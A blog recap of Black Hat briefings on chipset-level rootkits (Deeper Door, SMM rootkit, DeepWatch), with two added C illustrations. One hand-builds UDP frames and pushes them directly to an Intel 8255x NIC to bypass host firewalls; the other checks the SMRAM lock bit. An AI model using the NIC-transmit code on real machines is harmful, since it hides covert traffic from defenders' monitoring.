In the year since I posted Black Hat Final Thoughts for last year's event, a lot has happened. (I also reported on Black Hat Federal 2006 here, here, and here, and Black Hat USA 2003. I attended Black Hat USA 2002 but wasn't blogging then.) In this post I will offer thoughts on the presentations I attended.
- I started Wednesday by attending the keynote by Ian Angell, Professor of Information Systems at the London School of Economics. I want that hour of my life back. Quoting philosophers, looking only at failures and never successes, and pretending your cat can talk doesn't amount to a good speech. This was a low point of the Briefings, although there was enough humor to keep my attention.
- I saw two talks by Sherri Sparks and Shawn Embleton from Clear Hat Consulting. The first was Deeper Door: Exploiting the NIC Chipset, and I describe the second below. They were probably my favorite talks of the entire conference, because they were clear, concise, and informative. And -- shocker -- I skipped the DNS madness in favor of the second of these talks, because the Internet still appears to be working.
Deeper Door is a play on DeepDoor, the rootkit Joanna Rutkowska presented at Black Hat Federal 2006. DeepDoor hooks the Windows Network Driver Interface Specification (NDIS), whereas Deeper Door skips the Windows network stack entirely and interacts directly with the LAN controller to read and write packets. Deeper Door works with the Intel 8255x 10/100 Mbps Ethernet Controller Family and was tested with Intel PRO/100 B and PRO/100 S NICs. It loads as a Windows driver and performs memory-mapped writes to the controller's registers, which bypasses monitoring and enforcement systems (e.g., host-based firewalls and the like) that assume a process or application must be responsible for transmitting packets.
Transmitting traffic is fairly easy, and the demo showed hand-crafted UDP traffic passing the Windows and ZoneAlarm firewalls without a problem. Receiving traffic is a little trickier, because the arrival of a frame raises a frame reception (FR) interrupt that the CPU dispatches through the Interrupt Descriptor Table (IDT). One can use traditional techniques like hooking the IDT to get the packet to Deeper Door, or rely on something like an SMM rootkit (described next) or a Blue Pill-like rootkit to avoid touching the IDT at all. When Deeper Door receives a packet, it can alter the contents to make the packet appear benign (i.e., not a command-and-control packet from the mother ship), or it can erase the packet entirely so that the operating system never sees it.
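To make the transmit side concrete, here is an added example (my own illustration, not code from Sparks and Embleton or the Deeper Door driver) of what "hand-crafted UDP traffic written straight to the LAN controller" involves: the driver has to assemble the whole Ethernet/IPv4/UDP frame itself, including the IPv4 header checksum, then hand it to the 8255x as a simplified-mode Transmit Command Block and kick the Command Unit through the System Control Block. The SCB offsets, TCB layout and bit values follow the Intel 8255x Open Source Software Developer Manual; the MAC and IP addresses are constructed sample input, and the CSR is a simulated buffer so the code runs offline (a real driver would point it at the BAR mapped with MmMapIoSpace and use the TCB's physical address).

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* 8255x System Control Block (SCB) offsets within the memory-mapped CSR. */
#define SCB_CMD       0x02
#define SCB_GENPTR    0x04
#define SCB_CUC_START 0x0010  /* CU command field = Command Unit Start */

/* Transmit Command Block (TCB) command-word bits. SF (0x0008) is left clear,
 * which selects simplified mode: the frame sits inline after the header. */
#define TCB_CMD_TRANSMIT 0x0004
#define TCB_CMD_EL       0x8000  /* last block in the command list */
#define TCB_EOF          0x8000  /* in byte_count: end of frame */

struct tcb {                  /* fields are naturally aligned, no packing needed */
    uint16_t status;
    uint16_t command;
    uint32_t link;            /* bus address of next TCB; unused when EL is set */
    uint32_t tbd_array;       /* 0xFFFFFFFF: no TBD array (simplified mode) */
    uint16_t byte_count;      /* frame length | TCB_EOF */
    uint8_t  tx_threshold;    /* start transmitting after this many 8-byte units */
    uint8_t  tbd_count;       /* 0 in simplified mode */
    uint8_t  data[1518];      /* the raw Ethernet frame */
};
_Static_assert(offsetof(struct tcb, data) == 16, "TCB header must be 16 bytes");

/* RFC 1071 ones-complement checksum, used for the IPv4 header. */
uint16_t ip_checksum(const uint8_t *buf, size_t len)
{
    uint32_t sum = 0;
    for (size_t i = 0; i + 1 < len; i += 2)
        sum += (uint32_t)((buf[i] << 8) | buf[i + 1]);
    if (len & 1)
        sum += (uint32_t)(buf[len - 1] << 8);
    while (sum >> 16)
        sum = (sum & 0xFFFF) + (sum >> 16);
    return (uint16_t)~sum;
}

static void put16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)(v >> 8); p[1] = (uint8_t)v; }
static void put32(uint8_t *p, uint32_t v) { put16(p, (uint16_t)(v >> 16)); put16(p + 2, (uint16_t)v); }

/* Build Ethernet + IPv4 + UDP around payload; returns the frame length.
 * Nothing comes from the OS stack: MACs, IPs and ports are all supplied by the
 * caller, which is why a firewall watching sockets or NDIS sees nothing. */
size_t build_udp_frame(uint8_t *out, const uint8_t dst_mac[6], const uint8_t src_mac[6],
                       uint32_t src_ip, uint32_t dst_ip, uint16_t sport, uint16_t dport,
                       const uint8_t *payload, size_t plen)
{
    uint8_t *ip = out + 14, *udp = ip + 20;
    uint16_t ip_len = (uint16_t)(20 + 8 + plen);

    memcpy(out, dst_mac, 6);
    memcpy(out + 6, src_mac, 6);
    put16(out + 12, 0x0800);              /* EtherType IPv4 */

    memset(ip, 0, 20);
    ip[0] = 0x45;                         /* version 4, IHL 5 */
    put16(ip + 2, ip_len);
    put16(ip + 6, 0x4000);                /* DF, no fragmentation */
    ip[8] = 64;                           /* TTL */
    ip[9] = 17;                           /* protocol UDP */
    put32(ip + 12, src_ip);
    put32(ip + 16, dst_ip);
    put16(ip + 10, ip_checksum(ip, 20));  /* checksum field still zero here */

    put16(udp + 0, sport);
    put16(udp + 2, dport);
    put16(udp + 4, (uint16_t)(8 + plen));
    put16(udp + 6, 0);                    /* UDP checksum is optional over IPv4 */
    memcpy(udp + 8, payload, plen);
    return 14 + ip_len;
}

/* Fill one simplified-mode TCB: frame inline, end of list. */
void tcb_prepare(struct tcb *t, const uint8_t *frame, size_t len)
{
    memset(t, 0, sizeof *t);
    t->command      = TCB_CMD_TRANSMIT | TCB_CMD_EL;
    t->link         = 0xFFFFFFFFu;
    t->tbd_array    = 0xFFFFFFFFu;
    t->byte_count   = (uint16_t)(len | TCB_EOF);
    t->tx_threshold = 1;
    memcpy(t->data, frame, len);
}

/* Kick the Command Unit: TCB bus address into the SCB general pointer, then
 * CU Start into the SCB command word. These two MMIO writes are the whole
 * "send" as far as the host is concerned; no OS component is involved. */
void cu_start(volatile uint8_t *csr, uint32_t tcb_bus)
{
    *(volatile uint32_t *)(csr + SCB_GENPTR) = tcb_bus;
    *(volatile uint16_t *)(csr + SCB_CMD)    = SCB_CUC_START;
}

int main(void)
{
    /* Constructed sample input: locally administered MACs, TEST-NET-1 addresses. */
    static const uint8_t dst_mac[6] = {0x02,0,0,0,0,0x02}, src_mac[6] = {0x02,0,0,0,0,0x01};
    static const uint8_t payload[] = "beacon";
    static uint32_t csr_words[16];                         /* simulated CSR */
    volatile uint8_t *csr = (volatile uint8_t *)csr_words;
    static struct tcb t;
    uint8_t frame[1518];

    size_t n = build_udp_frame(frame, dst_mac, src_mac, 0xC0000201u, 0xC0000202u,
                               4444, 53, payload, sizeof payload - 1);
    tcb_prepare(&t, frame, n);
    cu_start(csr, 0x12345000u);                            /* no hardware touched */
    printf("frame %zu bytes, TCB byte_count 0x%04x, SCB cmd 0x%04x\n",
           n, t.byte_count, (unsigned)(csr[2] | (csr[3] << 8)));
    return 0;
}
```

The receive path the talk describes is the mirror image: the controller DMAs frames into Receive Frame Descriptors the driver owns, so a rootkit that has positioned itself ahead of the OS (IDT hook, SMM, or hypervisor) can rewrite or zero the descriptor's data before the real NDIS miniport ever looks at it.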
The speakers noted that disabling the NIC (via Windows interaction) doesn't stop Deeper Door; it can silently re-enable it. Even uninstalling the NIC (again via Windows) leaves the NIC in a state where it can send, but not receive, traffic.
This presentation reinforced the lesson that relying on an endpoint to defend itself is a bad idea. I've talked about trying to collect traffic on endpoints for incident response purposes, but a rootkit using Deeper Door technology could completely hide suspicious traffic from any host-based sniffer! In 2005 I wrote Rootkits Make NSM More Relevant Than Ever, and Deeper Door proves it.
- I stayed for their next talk, A New Breed of Rootkit: The System Management Mode (SMM) Rootkit. SMM was publicly brought to the attention of security researchers in 2006 by Loïc Duflot, followed by Phrack's System Management Mode Hacks by BSDaemon, coideloko, and D0nand0n. Sparks and Embleton wrote a chipset-level keylogger and data exfiltrator that resides in SMM and sends 16 bytes at a time. Combined with their NIC-centric rootkit, it's impressive work. The SMM rootkit demonstrates that chipset-level data structures, like the I/O Redirection Table, are the newest targets of subversion.
Sparks and Embleton claimed their SMM rootkit wouldn't be effective on newer systems (say 2006 and on) because a bit in the SMRAM control register called D_LCK is set, but Joanna Rutkowska said an Intel bug (to be fixed soon) makes clearing D_LCK on newer systems possible without a system reset.
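The D_LCK question is one a practitioner can actually check on their own hardware. The following is an added example, not something from the talk, that reads and decodes the SMRAM control register. It assumes a 945/965-class Intel chipset, where SMRAMC sits in the host bridge's PCI configuration space (bus 0, device 0, function 0) at offset 0x9D with G_SMRAME in bit 3, D_LCK in bit 4, D_CLS in bit 5 and D_OPEN in bit 6; the sysfs path and that offset are assumptions to be confirmed against your chipset datasheet, and the read itself needs root on Linux. The decode and verdict functions work on any byte value, which is what the constructed sample values exercise.

```c
#include <stdint.h>
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>

/* Assumptions: host bridge config space via sysfs, SMRAMC at 0x9D (945/965-class). */
#define SMRAMC_PCI_CONFIG "/sys/bus/pci/devices/0000:00:00.0/config"
#define SMRAMC_OFFSET     0x9D

#define SMRAMC_G_SMRAME (1u << 3)  /* SMRAM space enabled */
#define SMRAMC_D_LCK    (1u << 4)  /* lock: D_OPEN forced clear, bits become read-only */
#define SMRAMC_D_CLS    (1u << 5)  /* close: non-SMM accesses to the range go to VGA */
#define SMRAMC_D_OPEN   (1u << 6)  /* open: SMRAM readable/writable outside SMM */

struct smramc_state { int enabled, locked, closed, open; };

struct smramc_state smramc_decode(uint8_t v)
{
    struct smramc_state s;
    s.enabled = !!(v & SMRAMC_G_SMRAME);
    s.locked  = !!(v & SMRAMC_D_LCK);
    s.closed  = !!(v & SMRAMC_D_CLS);
    s.open    = !!(v & SMRAMC_D_OPEN);
    return s;
}

/* The property the talk's claim turns on. With D_LCK clear, ring-0 code can set
 * D_OPEN, copy its handler into SMRAM and clear D_OPEN again. With D_LCK set,
 * that path stays closed until reset, barring a chipset bug. */
int smramc_writable_from_ring0(uint8_t v)
{
    return !(v & SMRAMC_D_LCK);
}

/* Read the raw register byte; returns 0 on success, -1 if it cannot be read
 * (not root, no sysfs, or a host bridge where 0x9D means something else). */
int smramc_read(uint8_t *out)
{
    int fd = open(SMRAMC_PCI_CONFIG, O_RDONLY);
    if (fd < 0)
        return -1;
    int ok = lseek(fd, SMRAMC_OFFSET, SEEK_SET) == SMRAMC_OFFSET && read(fd, out, 1) == 1;
    close(fd);
    return ok ? 0 : -1;
}

int main(void)
{
    uint8_t v;
    if (smramc_read(&v) != 0) {
        fprintf(stderr, "cannot read SMRAMC (needs root and an Intel host bridge)\n");
        return 1;
    }
    struct smramc_state s = smramc_decode(v);
    printf("SMRAMC=0x%02x G_SMRAME=%d D_LCK=%d D_CLS=%d D_OPEN=%d -> %s\n",
           v, s.enabled, s.locked, s.closed, s.open,
           smramc_writable_from_ring0(v) ? "SMRAM reachable from ring 0"
                                         : "locked until reset");
    return 0;
}
```

A locked register only tells you the documented door is shut; it says nothing about a chipset bug of the kind Joanna described, or about whatever the BIOS put into SMRAM before it set the lock.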
- Staying with the chipset-as-battleground theme, I next attended Insane Detection of Insane Rootkits, or a Chipset Based Approach to Detect Virtualization Malware, a.k.a. DeepWatch, by Yuriy Bulygin. Bulygin recommended using firmware on an Intel microcontroller to detect and remove hypervisor rootkits. Specifically, he puts his code in the microcontroller used for Intel Active Management Technology. As noted on that page, Intel® Active Management Technology requires the platform to have an Intel® AMT-enabled chipset [like vPro], network hardware [like the Intel® 82573E Gigabit Ethernet Controller] and software [on a server]. The platform must also be connected to a power source and an active LAN port. If you know nothing about AMT, I suggest checking it out; the security implications are staggering. Bulygin claimed to be able to detect SMM rootkits, which was an excellent defensive follow-on to the talks I had just seen.
These three talks really emphasized a trend: the chipset is a new battleground. I would like to see a lot more information posted at the Intel Product Security Center. An indicator for me of their willingness to step up to the plate in this new era would be to see an advisory for the bug Joanna mentioned posted at their security site. Somehow I think more than 5 vulnerabilities have been fixed in their code since January 2007. Furthermore, you can include the BIOS as a related battleground. I am worried when I see vendors continue to add functionality into these low-level components. I plan to keep an eye on the Intel Software Network Blog for Manageability for further news.
- Next I attended Xploiting Google Gadgets: Gmalware and Beyond by Tom Stracener and Robert (Rsnake) Hansen. They showed that Google continues to be evil because it thinks being able to track user actions via redirection is more important than fixing security vulnerabilities. I sat with Mike Rash and Keith Jones. Speaking after the talk, I learned Keith was as confused as I was. We concluded that if you're not pen testing Web apps for a living, you probably weren't able to follow all of the vulnerabilities in the presentation, since they moved too quickly from issue to POC-as-movie to next issue.
- I finished the day with MetaPost-Exploitation by Val Smith and Colin Ames. This briefing was disappointing. I think the material was better suited to a training session where the students could have tried the techniques, rather than just watching them.
That's day 1. Please see my next post for day 2.